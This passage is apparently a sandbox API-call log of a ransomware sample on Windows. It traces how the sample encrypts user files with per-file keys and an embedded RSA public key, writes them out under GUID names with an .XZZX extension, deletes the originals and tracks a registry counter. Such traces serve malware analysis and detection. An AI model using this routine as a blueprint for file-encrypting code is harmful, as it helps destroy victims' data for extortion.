lpNumberOfBytesWritten=0x420e438*=0x28, lpOverlapped=0x0) returned 1 [0128.295] SetFilePointer (in: hFile=0x650, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x125 [0128.295] WriteFile (in: hFile=0x650, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.295] SetFilePointer (in: hFile=0x650, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12a [0128.295] SetErrorMode (uMode=0x1) returned 0x1 [0128.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0128.295] OutputDebugStringW (lpOutputString="end") [0128.295] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0128.295] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0128.296] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1ee70) returned 1 [0128.296] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1ee70, dwCertEncodingType=0x1, pInfo=0x3d0e0a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e0d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e0e0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde1d8) returned 1 [0128.296] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.297] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0128.297] CryptEncrypt (in: hKey=0x3cde1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0128.297] CryptEncrypt (in: hKey=0x3cde1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1eef8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1eef8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0128.297] WriteFile (in: hFile=0x650, lpBuffer=0x3d1eef8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1eef8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0128.297] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0128.297] WriteFile (in: hFile=0x650, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.297] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0128.298] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0128.298] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x638) returned 0x0 [0128.298] RegQueryValueExW (in: hKey=0x638, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xa4, lpcbData=0x420dfdc*=0x4) returned 0x0 [0128.298] RegCloseKey (hKey=0x638) returned 0x0 [0128.298] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x638) returned 0x0 [0128.298] RegSetValueExW (in: hKey=0x638, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xa5, cbData=0x4 | out: lpData=0x420dfec*=0xa5) returned 0x0 [0128.298] RegCloseKey (hKey=0x638) returned 0x0 [0128.298] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.298] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.299] CloseHandle (hObject=0x650) returned 1 [0128.299] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0128.300] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0128.300] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms")) returned 1 [0128.301] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms")) returned 0 Thread: id = 429 os_tid = 0x9c4 [0128.302] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.302] lstrcpyW (in: lpString1=0x434f460, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0128.302] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0128.302] SetErrorMode (uMode=0x1) returned 0x1 [0128.302] lstrcpyW (in: lpString1=0x434f860, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0128.302] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x83cb873, Data2=0x96f7, Data3=0x4a01, Data4=([0]=0x82, [1]=0xbc, [2]=0x25, [3]=0x4b, [4]=0x18, [5]=0xb3, [6]=0x2, [7]=0x36))) returned 0x0 [0128.302] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0128.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0128.302] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned 80 [0128.302] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="XZZX") returned 0x0 [0128.302] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x20) returned 1 [0128.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0128.303] ReadFile (in: hFile=0x644, lpBuffer=0x3c40ee0, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3c40ee0*, lpNumberOfBytesRead=0x434e418*=0xf8, lpOverlapped=0x0) returned 1 [0128.303] CloseHandle (hObject=0x644) returned 1 [0128.303] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0128.304] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0128.304] SetErrorMode (uMode=0x1) returned 0x1 [0128.304] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0128.304] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1ef80) returned 1 [0128.307] CryptGenKey (in: hProv=0x3d1ef80, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde358) returned 1 [0128.455] CryptExportKey (in: hKey=0x3cde358, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0128.455] CryptExportKey (in: hKey=0x3cde358, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0128.455] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.455] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0128.456] CryptDestroyKey (hKey=0x3cde358) returned 1 [0128.456] CryptReleaseContext (hProv=0x3d1ef80, dwFlags=0x0) returned 1 [0128.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\86A958F52BA3FCF7083CB8732FD8E13F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\86a958f52ba3fcf7083cb8732fd8e13f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0128.456] WriteFile (in: hFile=0x638, lpBuffer=0x3c40ee0*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3c40ee0*, lpNumberOfBytesWritten=0x434e438*=0xf8, lpOverlapped=0x0) returned 1 [0128.457] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf8 [0128.457] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0128.457] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfd [0128.457] WriteFile (in: hFile=0x638, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x36, lpOverlapped=0x0) returned 1 [0128.457] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x133 [0128.457] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0128.457] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x138 [0128.457] SetErrorMode (uMode=0x1) returned 0x1 [0128.457] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0128.457] OutputDebugStringW (lpOutputString="end") [0128.458] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0128.458] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0128.458] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1ef80) returned 1 [0128.458] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1ef80, dwCertEncodingType=0x1, pInfo=0x3d0e248*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e278*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e280*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde418) returned 1 [0128.458] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.459] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0128.459] CryptEncrypt (in: hKey=0x3cde418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0128.459] CryptEncrypt (in: hKey=0x3cde418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f008*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f008*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0128.459] WriteFile (in: hFile=0x638, lpBuffer=0x3d1f008*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f008*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0128.459] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0128.459] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0128.459] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0128.460] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0128.460] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x654) returned 0x0 [0128.460] RegQueryValueExW (in: hKey=0x654, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xa5, lpcbData=0x434dfdc*=0x4) returned 0x0 [0128.460] RegCloseKey (hKey=0x654) returned 0x0 [0128.460] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x654) returned 0x0 [0128.460] RegSetValueExW (in: hKey=0x654, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xa6, cbData=0x4 | out: lpData=0x434dfec*=0xa6) returned 0x0 [0128.460] RegCloseKey (hKey=0x654) returned 0x0 [0128.460] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.461] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.461] CloseHandle (hObject=0x638) returned 1 [0128.462] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0128.462] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0128.462] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms")) returned 1 [0128.463] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms")) returned 0 Thread: id = 430 os_tid = 0x9c8 [0128.475] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.476] lstrcpyW (in: lpString1=0x420f460, lpString2="D30YP5u1qzg5-VZ7306q.mkv" | out: lpString1="D30YP5u1qzg5-VZ7306q.mkv") returned="D30YP5u1qzg5-VZ7306q.mkv" [0128.476] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.476] SetErrorMode (uMode=0x1) returned 0x1 [0128.476] lstrcpyW (in: lpString1=0x420f860, lpString2="D30YP5u1qzg5-VZ7306q.mkv" | out: lpString1="D30YP5u1qzg5-VZ7306q.mkv") returned="D30YP5u1qzg5-VZ7306q.mkv" [0128.476] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x526033cf, Data2=0x323f, Data3=0x4075, Data4=([0]=0x99, [1]=0x32, [2]=0xe3, [3]=0xb0, [4]=0x4d, [5]=0xb2, [6]=0x1e, [7]=0x93))) returned 0x0 [0128.476] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D30YP5u1qzg5-VZ7306q.mkv") returned 65 [0128.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0128.476] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned 78 [0128.476] StrStrW (lpFirst="D30YP5u1qzg5-VZ7306q.mkv", lpSrch="XZZX") returned 0x0 [0128.476] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D30YP5u1qzg5-VZ7306q.mkv", dwFileAttributes=0x20) returned 1 [0128.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D30YP5u1qzg5-VZ7306q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\d30yp5u1qzg5-vz7306q.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0128.478] ReadFile (in: hFile=0x638, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xb9ff, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0xb9ff, lpOverlapped=0x0) returned 1 [0128.479] CloseHandle (hObject=0x638) returned 1 [0128.479] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0128.480] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0128.480] SetErrorMode (uMode=0x1) returned 0x1 [0128.480] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0128.480] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f090) returned 1 [0128.483] CryptGenKey (in: hProv=0x3d1f090, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde298) returned 1 [0128.624] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0128.625] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0128.625] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.625] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0128.625] CryptDestroyKey (hKey=0x3cde298) returned 1 [0128.625] CryptReleaseContext (hProv=0x3d1f090, dwFlags=0x0) returned 1 [0128.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0fcb2df10ca6b6cb526033cf10c79b13.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0128.626] WriteFile (in: hFile=0x638, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xb9ff, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0xb9ff, lpOverlapped=0x0) returned 1 [0128.628] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb9ff [0128.628] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.628] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xba04 [0128.628] WriteFile (in: hFile=0x638, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: 